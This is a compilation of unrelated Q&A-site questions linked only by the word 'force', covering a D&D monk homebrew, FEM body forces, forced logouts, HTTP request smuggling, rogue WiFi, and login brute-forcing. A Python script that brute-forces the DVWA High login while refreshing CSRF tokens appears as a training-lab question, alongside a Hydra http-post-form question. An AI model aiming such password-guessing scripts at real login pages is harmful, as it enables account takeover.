Force Apache Server/Tomcat to ignore Transfer-Encoding

I am trying to reproduce HTTP request smuggling using an Apache HTTP Server as a reverse proxy (using mod_proxy) and a Tomcat Server in the back-end.

Is it possible to force either Apache Server or Tomcat to ignore Transfer-Encoding in requests (and only use Content-Length)? Or is request smuggling simply not possible with this configuration?

Is this revised homebrew Way of the Force monk subclass balanced compared to the official monk subclasses?

This is a monk meant to emulate a Force user, as in the Star Wars universe.
There is a spoiler from The Last Jedi film. I thought that the ability to telekinetically affect your environment is too cool a concept to be left to a couple of spells, so I wanted to create a martial class that could utilise these concepts.

The homebrew subclass in this question was finally playtested, so I can come back and try and refine it.

However, it was not an extensive playtest, so assessment from the community is appreciated. Prior to playing, I removed the multiple concentration feature of Force Prowess, leaving just the increased cost for more targets component.

The main issues seen were:

  • the contested checks resulted in both more rolling and more swinginess in whether the ability worked
  • using contested checks instead of saves meant that boss targets couldn’t circumvent the abilities
  • the ability to force something prone from range or to restrain something were both very powerful (especially against flying targets)

It was also unsatisfying to attempt to use an effect, just for it to fail, and my limited resource be wasted. As I was playtesting, I also found myself unwilling to use the Greater Telekinesis feature that lets you move creatures as an attack – maybe this was just due to the situations I was in, but it could just be a quirk of the combats I found myself in.

Additionally, I made some changes to Force Choke, but was unable to test it.

The changes I’ve made off the back of the above issues are changing all of the contested checks to Strength saving throws. This simplifies the text, and lets legendary creatures save from the effects, as well as reduce the amount of rolling. I also switched to using the player’s wisdom modifier instead of proficiency modifier for effects that I wanted to have a limited number of targets; I don’t think this should change too much, however.

I am still worried about the balance and feel of this subclass. It still has the issue that, quite often, a turn can be wasted trying to get a target to succumb to a force effect, and you fail consistently, wasting a lot of resources. Other subclasses get features they can use without resources; currently, this subclass only has Life Sense for that. Additionally, the ability to force something prone, or to restrain a target, from range gives a large incentive to just keep trying to get these powerful effects. The use of Strength saving throws instead of Dexterity saving throws is also a tad worrying; I’m not sure how unbalanced that is, though.

How balanced does this subclass seem in relation to officially published monk subclasses? What ways could it be improved to increase player satisfaction, with regards to resource expenditure, that official subclasses take into account?

Way of the Force

Monks that follow the Way of the Force have learnt how to use their ki to manipulate their surroundings with their mind, tapping into the energy that inhabits all things.


Starting when you choose this tradition at 3rd level, you can use your ki to telekinetically manipulate the world around you. You gain the mage hand cantrip if you don’t already know it, and it is invisible.

Force Radius. A force radius of 30 ft that is centered on you defines where you can use ki specific force features. Your force radius increases to 60 ft at level 11, and increases to 120 ft at level 17.

When you take the Attack action on your turn, you can forgo one of your attacks to spend 1 ki point to achieve one of the following effects against a Large or smaller creature, or an object, in your force radius.

  • Force Shove. The target must make a Strength saving throw. If they fail the save, you can do one of the following: knock the target prone, push the target up to half your Force Radius directly away from you, or pull the target up to half your Force Radius directly towards you. Unattended objects automatically fail this contested check, and if an object is held by a creature the creature makes the check.

  • Force Grab. The target must make a Strength saving throw. If the target fails the saving throw, it is grappled for one minute while you concentrate on the effect (as if concentrating on a spell). The target can use an action to try and break the grapple, repeating the saving throw.
    Unattended objects automatically fail this saving throw, and if an object is held by a creature the creature makes the save. An object held in this way can be moved to a location within your force radius up to half your force radius away from its origin point as an object interaction, and stay aloft in the air at the end of the move if you wish.

Greater Force Connection

Mind Powers. At level 6 your connection to the Force grows. You gain the ability to cast Charm Person (1 ki point) and Suggestion (2 ki points) using Wisdom as your spellcasting ability modifier. You can cast Charm Person at higher levels by spending one ki point for every level above first level you wish to cast it at, to a maximum total number of ki points equal to your wisdom modifier.

Life Sense. You can concentrate for a minute and learn the number of creatures within double your force radius, as well as their locations relative to your own. You do not learn any further information about these creatures, such as creature type or identity. You cannot detect either undead creatures or constructs with this feature.

Greater Telekinesis. Your Telekinesis abilities now work on Huge or smaller creatures and objects, and you can move creatures with Force Grab as well as objects. When moved in this way, you must use an attack to force the creature to make a Strength saving throw. If they fail, they are moved to a location of your choice within your force radius, following the same rules as moving objects with Force Grab. If they succeed, they are not moved.

Force Prowess

At 11th level you can apply the effects of Telekinesis to additional creatures and objects beyond the first by spending one ki point for each additional creature, up to a maximum of your wisdom modifier. When moving objects using Telekinesis, you can move any number of held objects using a single object interaction.
Your Telekinesis abilities now work on Gargantuan or smaller creatures and objects.
Finally, when you attempt to Force Grab a creature, you can increase the number of ki points you spend to 3 ki points and try to hold a creature more fully. Instead of being grappled when you succeed on the contested Force Grab check, a target is restrained, and repeats the contested check at the end of each of their turns. When you target additional creatures with this effect you must spend 3 additional ki points for each additional creature.

Force Mastery

At 17th level your mastery over your ki and the ki of others is legendary.

  • The radius of your life sense increases to 1 mile, and you can tell the creature type of each detected creature.
  • Creatures remain unaware of the effect you have had on their mind when you use Greater Force Connection abilities on them.

In addition to the features above, you can choose to gain one of the following features:

  • Force Choke. When a creature is held and restrained by your Force Grab, you can choose to start choking them if they are within half of your force radius. As an action on your turn, you can choose one creature that is under the effects of your Force Grab, and start choking them. They begin choking, and they become paralyzed for a minute. If they take any damage while paralyzed in this way, this effect ends on them. Additionally, you can use an action on following turns to crush the windpipe of any creature that has started choking in this way. They have to make a Constitution saving throw, or be reduced to 0 hit points. Creatures that don’t need to breathe cannot be reduced to 0 hit points in this way, but can still be paralyzed by this feature. If a creature manages to escape your Force Grab, they are no longer under any of the effects from this feature.

  • Force Lightning. As an action on your turn, you can spend 5 ki points to start spewing lightning at your foes, concentrating on this effect for up to one minute. A beam of lightning flashes out from your hand in a 5-foot-wide, 120-foot-long line. Each creature in the line must make a Dexterity saving throw. On a failed save, a creature takes 10d6 lightning damage. On a successful save, it takes half as much damage. You can create a new line of lightning as your bonus action on any subsequent turn until your concentration ends, without having to spend further ki points. These lines of lightning vanish at the end of your turn.

  • Force Projection. As an action on your turn, you can cast Mislead by spending 5 ki points. Instead of the duplicate appearing where you are, however, you can choose to make the duplicate appear within 30ft of an ally you are aware of on the same plane of existence as yourself.

Is it less secure to force periodic user logouts vs keep them logged in?

I’ve been unable to find any research or information on this.

Google periodically signs me out and forces me to sign back in. I have multiple devices and multiple Google accounts, so it’s a bit frustrating, but that’s just how it is. However, I was thinking about whether this practice is actually secure.

  1. It seems to encourage easy-to-remember / easy-to-type passwords over longer stronger passwords
  2. There’s more chance for a keylogger to intercept a password
  3. There’s more chance for a physical observer to watch you enter a password
  4. It may desensitise users and lead to them automatically entering their password without checking a url

How does this balance against the inherent insecurity of indefinitely extending a login’s lifetime?

It’s worth noting that Google doesn’t ever log me out of my mobile device – I wonder why it treats this environment differently? Security vs UX concerns?

Is there a Maximum force rating?

I’m curious what the current maximum force rating is.

EDIT: Originally I had asked in regard to specs, but with new info about character advancement I found out that the original question no longer makes sense, as you can take every spec (aside from those that are the same between books, where there is only one of them, like the Force Sensitive in Edge of Empire and Age of Rebellion, which is the same spec): Taking out-of-career specialisations

So the question now would be what is the real maximum force rating? Characteristics are restricted to 6, skills to 5 (naturally lower each at char creation).

What about force rating: does it have a maximum? With all the current specs added together, a force rating of about 12 is possible (maxed out all specs).

So the question, like I said, is: is there a max to force rating rules-wise?

Specify a force on the entire body (e.g. gravity)

In the thread "Stress calculations using finite elements", User21 showed an example of how to define a force over the entire body as a boundary condition during an FEM calculation. See the screenshot below from the corresponding position in this thread.


In the description of the definition of the boundary condition (force on the entire body), User21 has defined the differential equation system as follows.

$ps == \{0, -9.8\}$

Which unit has this power? Is the unit $N/m^2$?

If $N/m^2$ is the correct unit, then I can understand how to calculate the normalized body force from the density and volume of the body and insert it into the right side of the differential equation.

If $N/m^2$ is not the right unit, then I have the following questions for you:

How is the density of the material or the mass considered here? Could you please show how to use this correctly in the equation?

In my case I have a centripetal acceleration due to rotation and the equation would look like this:

$ps == \{\omega^2 * x, \omega^2 * y\}$

Omega is the angular velocity of the body for which the deformations are to be calculated with FEM. And the expression

$\omega^2 * r$

is the centripetal acceleration, where $r$ is the distance from the center of rotation.

However, here too I have the problem that density and mass are not considered.

Does anybody have an answer to the question how to use the density and the mass correctly in the equation?

Many thanks in advance!

hydra brute force http-post-form

I know that for Hydra's HTTP post form to succeed, you have to insert the error message shown when the password is wrong.

But in my case, I don’t have an error message; I have a redirection to a page on error.

How do I solve the problem?

login: /admins/

success: /admins/index.php

error: /my_account

This is the scenario. How do I solve my problem?

Brute Force HIGH DVWA with Python Script

I’m new to Python and I’m trying to brute-force DVWA at the High level. I found this script from . But this error always pops up when I execute it. Any help is welcome, thank you.


    File "", line 32, in
      csrf_token = soup.findAll(attrs={"name": "user_token"})[0].get('value')
    IndexError: list index out of range.

Whole Script:

    from sys import argv
    import requests
    from BeautifulSoup import BeautifulSoup as Soup

    # give our arguments more semantic friendly names
    script, filename, success_message = argv
    txt = open(filename)

    # set up our target, cookie and session
    url = ''
    cookie = {'security': 'high', 'PHPSESSID':'b8dgqhbue8vdinrd87leug1no1'}
    s = requests.Session()
    target_page = s.get(url, cookies=cookie)

    '''
    checkSuccess
    @param: html (String)

    Searches the response HTML for our specified success message
    '''
    def checkSuccess(html):
        # get our soup ready for searching
        soup = Soup(html)
        # check for our success message in the soup
        search = soup.findAll(text=success_message)

        if not search:
            success = False
        else:
            success = True

        # return the brute force result
        return success

    # Get the intial CSRF token from the target site
    page_source = target_page.text
    soup = Soup(page_source);
    csrf_token = soup.findAll(attrs={"name": "user_token"})[0].get('value')

    # Loop through our provided password file
    with open(filename) as f:
        print 'Running brute force attack...'
        for password in f:
            # setup the payload
            payload = {'username': 'admin', 'password': password, 'Login': 'Login', 'user_token': csrf_token}
            r = s.get(url, cookies=cookie, params=payload)
            success = checkSuccess(r.text)
            if not success:
                # if it failed the CSRF token will be changed. Get the new one
                soup = Soup(r.text)
                csrf_token = soup.findAll(attrs={"name": "user_token"})[0].get('value')
            else:
                # Success! Show the result
                print 'Password is: ' + password
                break

    # We failed, bummer.
    if not success:
        print 'Brute force failed. No matches found.'

Can a malicious WIFI network force a connection

Say I enter a place with public WIFI. Of course, I would not connect to the network since I know it’s risky, but I do have my computer turned on. Can an attacker know my computer is there and force a connection to it? If they would be able to do so, then my precaution is wasted, and any attacks a malicious network could do would be done.

Telling me whether this could be done and how to stop it would be very helpful, thanks.

As a side note, connecting to a known network may not be safe either. Could hackers “replace” an existing network with a malicious network with the same name? If so, how do I protect myself against it?